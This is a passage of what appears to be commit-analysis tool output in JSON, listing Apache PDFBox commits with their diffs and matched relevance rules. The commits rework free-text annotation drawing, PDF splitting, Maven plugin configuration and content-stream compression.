shape", + "+ if (\"FreeTextCallout\".equals(annotation.getIntent())", + "+ && !LE_NONE.equals(annotation.getLineEndingStyle())", + "+ && pathsArray.length >= 4)", + "+ {", + "+ // check only needed to avoid q cm Q if LE_NONE", + "+ float x2 = pathsArray[2];", + "+ float y2 = pathsArray[3];", + "+ float x1 = pathsArray[0];", + "+ float y1 = pathsArray[1];", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "+ }", + "+ ", + "+ //TODO display border and text", + "+ // how to set the text color? Apparently red is the default.", + "+ }", + "+ catch (IOException ex)", + "+ {", + "+ LOG.error(ex);", + "+ }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "a032a8f29dbb69b762b9fbf46e9c2d22fc142a42", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528392302, + "hunks": 4, + "message": "PDFBOX-4071: simplify code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833129 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java", + "index fa01e52cd..310285817 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java", + "@@ -20,3 +20,2 @@ import java.io.File;", + " import java.io.IOException;", + "-import java.io.FileOutputStream;", + "@@ -25,3 +24,2 @@ import java.util.List;", + " import org.apache.pdfbox.pdmodel.PDDocument;", + "-import org.apache.pdfbox.pdfwriter.COSWriter;", + " import org.apache.pdfbox.multipdf.Splitter;", + "@@ -172,4 +170,3 @@ public final class PDFSplit", + " {", + "- String fileName = outputPrefix + \"-\" + (i + 1) + \".pdf\";", + "- writeDocument(doc, fileName);", + "+ doc.save(outputPrefix + \"-\" + (i + 1) + \".pdf\");", + " }", + "@@ -193,11 +190,2 @@ public final class PDFSplit", + "- private static void writeDocument( PDDocument doc, String fileName ) throws IOException", + "- {", + "- try (FileOutputStream output = new FileOutputStream(fileName);", + "- COSWriter writer = new COSWriter(output))", + "- {", + "- writer.write(doc);", + "- }", + "- }", + "-", + " /**" + ], + "changed_files": [ + "tools/src/main/java/org/apache/pdfbox/tools/PDFSplit.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "f8092d633c14e26b6f9015623a07de6524fd1880", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532264250, + "hunks": 2, + "message": "PDFBOX-4271: no longer use the old plugin, as suggested by Karl Heinz Marbaise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836436 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index b664c95c8..2858e38ae 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -243,8 +243,2 @@", + " ", + "- ", + "- com.googlecode.maven-download-plugin", + "- ", + "- maven-download-plugin", + "- 1.1.0", + "- ", + " ", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index e1d566889..3e1318602 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -109,4 +109,3 @@", + " com.googlecode.maven-download-plugin", + "- ", + "- maven-download-plugin", + "+ download-maven-plugin", + " " + ], + "changed_files": [ + "parent/pom.xml", + "preflight/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4271": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4271", + "relevance": 2 + } + ] + }, + { + "commit_id": "1935ded739bd338450cddf24bb003b35d4d0228e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530725558, + "hunks": 19, + "message": "PDFBOX-3353: remove unneeded stroke(), unneeded rotation, unneeded /RD handling, use Adobe offsets for non-cloudy, adjust BBox and offsets and width when /RD is set git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835073 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index 071d9ce67..9904364b6 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -17,3 +17,2 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + "-import java.awt.geom.AffineTransform;", + " import java.io.IOException;", + "@@ -125,3 +124,6 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- cs.stroke();", + "+ if (pathsArray.length > 0)", + "+ {", + "+ cs.stroke();", + "+ }", + "@@ -156,5 +158,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "-", + "-", + "- //TODO this segment was copied from square handler. Refactor?", + "+ PDRectangle borderBox;", + " PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "@@ -162,2 +162,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "+ //TODO this segment was copied from square handler. Refactor?", + " CloudyBorder cloudyBorder = new CloudyBorder(cs,", + "@@ -168,3 +169,4 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "- appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ borderBox = cloudyBorder.getBBox();", + "+ appearanceStream.setBBox(borderBox);", + " appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "@@ -179,6 +181,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " // border difference.", + "- // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", + "- // be set to be the line width and the /Rect is enlarged by the /RD amount", + "-", + "- PDRectangle borderBox;", + "+ // - if /RD is not set then we don't touch /RD etc because Adobe doesn't either.", + " float[] rectDifferences = annotation.getRectDifferences();", + "@@ -186,13 +185,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- borderBox = getPaddedRectangle(getRectangle(), ab.width/2);", + "- // the differences rectangle", + "- annotation.setRectDifferences(ab.width/2);", + "- annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", + "-", + "- // when the normal appearance stream was generated BBox and Matrix have been set to the", + "- // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", + "- annotation.getNormalAppearanceStream().setBBox(getRectangle());", + "- AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", + "- -getRectangle().getLowerLeftY());", + "- annotation.getNormalAppearanceStream().setMatrix(transform);", + "+ borderBox = getRectangle();", + " }", + "@@ -201,4 +190,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " borderBox = applyRectDifferences(getRectangle(), rectDifferences);", + "- borderBox = getPaddedRectangle(borderBox, ab.width/2);", + "+ annotation.getNormalAppearanceStream().setBBox(borderBox);", + " }", + "+ borderBox = getPaddedRectangle(borderBox, ab.width / 2);", + " cs.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", + "@@ -214,3 +204,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " float yOffset;", + "- float width = rotation == 90 || rotation == 270 ? getRectangle().getHeight(): getRectangle().getWidth();", + "+ float width = rotation == 90 || rotation == 270 ? borderBox.getHeight(): borderBox.getWidth();", + " // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", + "@@ -221,2 +211,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "+ //TODO cloudy needs to be reviewed too.", + " factor = 2;", + "@@ -224,2 +215,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " float fontSize = extractFontSize(annotation);", + "+ // used by Adobe, no idea where it comes from, actual font bbox max y is 0.931", + "+ // gathered by creating an annotation with width 0.", + "+ float yDelta = 0.7896f;", + " switch (rotation)", + "@@ -227,12 +221,12 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " case 180:", + "- xOffset = - getRectangle().getUpperRightX() + fontSize / 2 * factor; ", + "- yOffset = - getRectangle().getLowerLeftY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ xOffset = - borderBox.getUpperRightX() + ab.width * 2 * factor; ", + "+ yOffset = - borderBox.getLowerLeftY() - ab.width * 2 * factor - yDelta * fontSize * factor;", + " break;", + " case 90:", + "- xOffset = getRectangle().getLowerLeftY() + fontSize / 2 * factor;", + "- yOffset = - getRectangle().getLowerLeftX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ xOffset = borderBox.getLowerLeftY() + ab.width * 2 * factor;", + "+ yOffset = - borderBox.getLowerLeftX() - ab.width * 2 * factor - yDelta * fontSize * factor;", + " break;", + " case 270:", + "- xOffset = - getRectangle().getUpperRightY() + fontSize / 2 * factor;", + "- yOffset = getRectangle().getUpperRightX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ xOffset = - borderBox.getUpperRightY() + ab.width * 2 * factor;", + "+ yOffset = borderBox.getUpperRightX() - ab.width * 2 * factor - yDelta * fontSize * factor;", + " break;", + "@@ -240,4 +234,4 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " default:", + "- xOffset = getRectangle().getLowerLeftX() + fontSize / 2 * factor;", + "- yOffset = getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ xOffset = borderBox.getLowerLeftX() + ab.width * 2 * factor;", + "+ yOffset = borderBox.getUpperRightY() - ab.width * 2 * factor - yDelta * fontSize * factor;", + " break;", + "@@ -245,3 +239,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " cs.setFont(font, fontSize);", + "- cs.setNonStrokingColor(strokingColor);", + "+ cs.setNonStrokingColor(strokingColor.getComponents());", + " AppearanceStyle appearanceStyle = new AppearanceStyle();", + "@@ -252,3 +246,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " .text(new PlainText(annotation.getContents()))", + "- .width(width - fontSize / factor)", + "+ .width(width - ab.width * factor * 4)", + " .wrapLines(true)", + "@@ -285,3 +279,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", + "+ // arrow length is 9 * width at about 30\u00c2\u00b0 => 10 * width seems to be enough", + " rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "2b0381aa841d6094ade83ac1e73a175a8bb7bda4", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530813788, + "hunks": 7, + "message": "PDFBOX-3353: support and use compression for long content streams git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835166 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "index ca1a87077..f16140efa 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "@@ -46,2 +46,15 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", + "+ /**", + "+ * Create a new appearance stream.", + "+ *", + "+ * @param appearance The appearance stream to write to.", + "+ * @param compress whether the content stream is to be compressed. Set this to true when", + "+ * creating long content streams.", + "+ * @throws IOException If there is an error writing to the content stream.", + "+ */", + "+ public PDAppearanceContentStream(PDAppearanceStream appearance, boolean compress) throws IOException", + "+ {", + "+ this(appearance, appearance.getStream().createOutputStream(compress ? COSName.FLATE_DECODE : null));", + "+ }", + "+", + " /**", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "index 1300770d9..8ac1250f8 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "@@ -128,3 +128,21 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " PDAppearanceEntry appearanceEntry = getNormalAppearance();", + "- return getAppearanceEntryAsContentStream(appearanceEntry);", + "+ return getAppearanceEntryAsContentStream(appearanceEntry, false);", + "+ }", + "+ ", + "+ /**", + "+ * Get the annotations normal appearance content stream.", + "+ * ", + "+ *

    ", + "+ * This will get the annotations normal appearance content stream,", + "+ * to 'draw' to.", + "+ * ", + "+ * @param compress whether the content stream is to be compressed. Set this to true when", + "+ * creating long content streams.", + "+ * @return the appearance entry representing the normal appearance.", + "+ * @throws IOException", + "+ */", + "+ PDAppearanceContentStream getNormalAppearanceAsContentStream(boolean compress) throws IOException", + "+ {", + "+ PDAppearanceEntry appearanceEntry = getNormalAppearance();", + "+ return getAppearanceEntryAsContentStream(appearanceEntry, compress);", + " }", + "@@ -208,5 +226,7 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " * Get a rectangle enlarged by the differences.", + "- * ", + "- *

    Creates a new rectangle with differences added to each side.", + "- * .", + "+ *", + "+ *

    ", + "+ * Creates a new rectangle with differences added to each side. If there are no valid", + "+ * differences, then the original rectangle is returned.", + "+ *", + " * @param rectangle the rectangle.", + "@@ -230,5 +250,7 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + " * Get a rectangle with the differences applied to each side.", + "- * ", + "- *

    Creates a new rectangle with differences added to each side.", + "- * .", + "+ *", + "+ *

    ", + "+ * Creates a new rectangle with differences added to each side. If there are no valid", + "+ * differences, then the original rectangle is returned.", + "+ *", + " * @param rectangle the rectangle.", + "@@ -470,3 +492,4 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + "- private PDAppearanceContentStream getAppearanceEntryAsContentStream(PDAppearanceEntry appearanceEntry) throws IOException", + "+ private PDAppearanceContentStream getAppearanceEntryAsContentStream(", + "+ PDAppearanceEntry appearanceEntry, boolean compress) throws IOException", + " {", + "@@ -483,3 +506,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", + "- return new PDAppearanceContentStream(appearanceStream);", + "+ return new PDAppearanceContentStream(appearanceStream, compress);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index b9e0c9771..e18d76100 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -79,3 +79,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream(true))", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "54c2a7af40a6247588a80712b704f657c61825a1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527335890, + "hunks": 12, + "message": "PDFBOX-3353: draw the box git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832305 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index 3e1b2edf7..6cd839ea9 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -17,2 +17,3 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + "+import java.awt.geom.AffineTransform;", + " import java.io.IOException;", + "@@ -23,2 +24,3 @@ import org.apache.pdfbox.pdmodel.common.PDRectangle;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + "@@ -26,2 +28,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationFreeText;", + " import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", + " import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.SHORT_STYLES;", + "@@ -50,3 +54,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " PDAnnotationFreeText annotation = (PDAnnotationFreeText) getAnnotation();", + "- PDRectangle rect = annotation.getRectangle();", + " float[] pathsArray = new float[0];", + "@@ -62,33 +65,22 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " PDColor color = annotation.getColor();", + "- if (color == null || color.getComponents().length == 0 || Float.compare(ab.width, 0) == 0)", + "+", + "+ // width 0 = no border", + "+ // pdf_commenting_new.pdf page 3", + "+ // Root/Pages/Kids/[2]/Kids/[0]/Annots/[5]/BS/W", + "+ if (Float.compare(ab.width, 0) == 0)", + " {", + "+ //TODO what happens if there is a callout?", + "+ //TODO skip, don't return when we know how to make text", + "+ // (maybe refactor the rectangle drawing segment)", + " return;", + " }", + "-", + "- if (pathsArray.length > 0)", + "+ if (color == null || color.getComponents().length == 0)", + " {", + "- // Adjust rectangle even if not empty", + "- // CTAN-example-Annotations.pdf p1", + "- //TODO in a class structure this should be overridable", + "- float minX = Float.MAX_VALUE;", + "- float minY = Float.MAX_VALUE;", + "- float maxX = Float.MIN_VALUE;", + "- float maxY = Float.MIN_VALUE;", + "- for (int i = 0; i < pathsArray.length / 2; ++i)", + "- {", + "- float x = pathsArray[i * 2];", + "- float y = pathsArray[i * 2 + 1];", + "- minX = Math.min(minX, x);", + "- minY = Math.min(minY, y);", + "- maxX = Math.max(maxX, x);", + "- maxY = Math.max(maxY, y);", + "- }", + "- // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", + "- rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", + "- rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", + "- rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", + "- rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", + "- annotation.setRectangle(rect);", + "+ //TODO remove this when we've managed to parse /DA", + "+ color = new PDColor(new float[]{0}, PDDeviceGray.INSTANCE);", + " }", + "+ //TODO how to set the text color? Apparently red is the default????", + "+", + "+", + " try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "@@ -99,3 +91,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // in reality, Adobe uses the non stroking color from /DA as stroking color. WTF?", + "+ //TODO Adobe uses the last non stroking color from /DA as stroking color. WTF????", + " boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "@@ -107,2 +99,90 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+", + "+", + "+ //TODO this segment was copied from square handler. Refactor?", + "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "+ {", + "+ CloudyBorder cloudyBorder = new CloudyBorder(cs,", + "+ borderEffect.getIntensity(), ab.width, getRectangle());", + "+ cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", + "+ annotation.setRectangle(cloudyBorder.getRectangle());", + "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "+ }", + "+ else", + "+ {", + "+ // handle the border box", + "+ //", + "+ // There are two options. The handling is not part of the PDF specification but", + "+ // implementation specific to Adobe Reader", + "+ // - if /RD is set the border box is the /Rect entry inset by the respective", + "+ // border difference.", + "+ // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", + "+ // be set to be the line width and the /Rect is enlarged by the /RD amount", + "+", + "+ PDRectangle borderBox;", + "+ float[] rectDifferences = annotation.getRectDifferences();", + "+ if (rectDifferences.length == 0)", + "+ {", + "+ borderBox = getPaddedRectangle(getRectangle(), ab.width/2);", + "+ // the differences rectangle", + "+ annotation.setRectDifferences(ab.width/2);", + "+ annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", + "+", + "+ // when the normal appearance stream was generated BBox and Matrix have been set to the", + "+ // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", + "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", + "+ AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", + "+ -getRectangle().getLowerLeftY());", + "+ annotation.getNormalAppearanceStream().setMatrix(transform);", + "+ }", + "+ else", + "+ {", + "+ borderBox = applyRectDifferences(getRectangle(), rectDifferences);", + "+ borderBox = getPaddedRectangle(borderBox, ab.width/2);", + "+ }", + "+ cs.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", + "+ borderBox.getWidth(), borderBox.getHeight());", + "+ }", + "+ cs.drawShape(ab.width, hasStroke, hasBackground);", + "+", + "+", + "+", + "+ if (pathsArray.length > 0)", + "+ {", + "+ PDRectangle rect = getRectangle();", + "+", + "+ // Adjust rectangle", + "+ // important to do this after the rectangle has been painted, because the", + "+ // final rectangle will be bigger due to callout", + "+ // CTAN-example-Annotations.pdf p1", + "+ //TODO in a class structure this should be overridable", + "+ float minX = Float.MAX_VALUE;", + "+ float minY = Float.MAX_VALUE;", + "+ float maxX = Float.MIN_VALUE;", + "+ float maxY = Float.MIN_VALUE;", + "+ for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ {", + "+ float x = pathsArray[i * 2];", + "+ float y = pathsArray[i * 2 + 1];", + "+ minX = Math.min(minX, x);", + "+ minY = Math.min(minY, y);", + "+ maxX = Math.max(maxX, x);", + "+ maxY = Math.max(maxY, y);", + "+ }", + "+ // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", + "+ rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", + "+ rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", + "+ rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", + "+ rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", + "+ annotation.setRectangle(rect);", + "+ ", + "+ // need to set the BBox too, because rectangle modification came later", + "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", + "+ }", + "+", + "+ // draw callout line(s)", + " for (int i = 0; i < pathsArray.length / 2; ++i)", + "@@ -152,5 +232,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- ", + "- //TODO display border and text", + "- // how to set the text color? Apparently red is the default.", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "fedc93c03356383d9b57ae0c39244aa6d2c11bab", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528051147, + "hunks": 5, + "message": "PDFBOX-3353: draw text box git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832782 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index ebd7eb35c..96c3f4c6a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -25,2 +25,3 @@ import org.apache.pdfbox.cos.COSArray;", + " import org.apache.pdfbox.cos.COSBase;", + "+import org.apache.pdfbox.cos.COSNumber;", + " import org.apache.pdfbox.cos.COSObject;", + "@@ -29,2 +30,4 @@ import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + " import 